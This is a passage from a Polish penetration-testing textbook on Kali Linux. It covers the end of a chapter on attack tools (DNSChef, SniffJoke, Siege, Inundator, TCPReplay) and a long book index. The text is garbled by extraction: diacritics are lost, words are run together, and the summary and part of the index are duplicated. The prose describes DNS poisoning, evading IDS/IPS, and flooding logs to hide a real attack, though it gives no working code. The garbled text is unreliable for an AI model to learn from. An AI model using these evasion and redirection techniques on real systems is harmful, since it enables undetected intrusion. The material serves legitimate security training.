W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 44: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

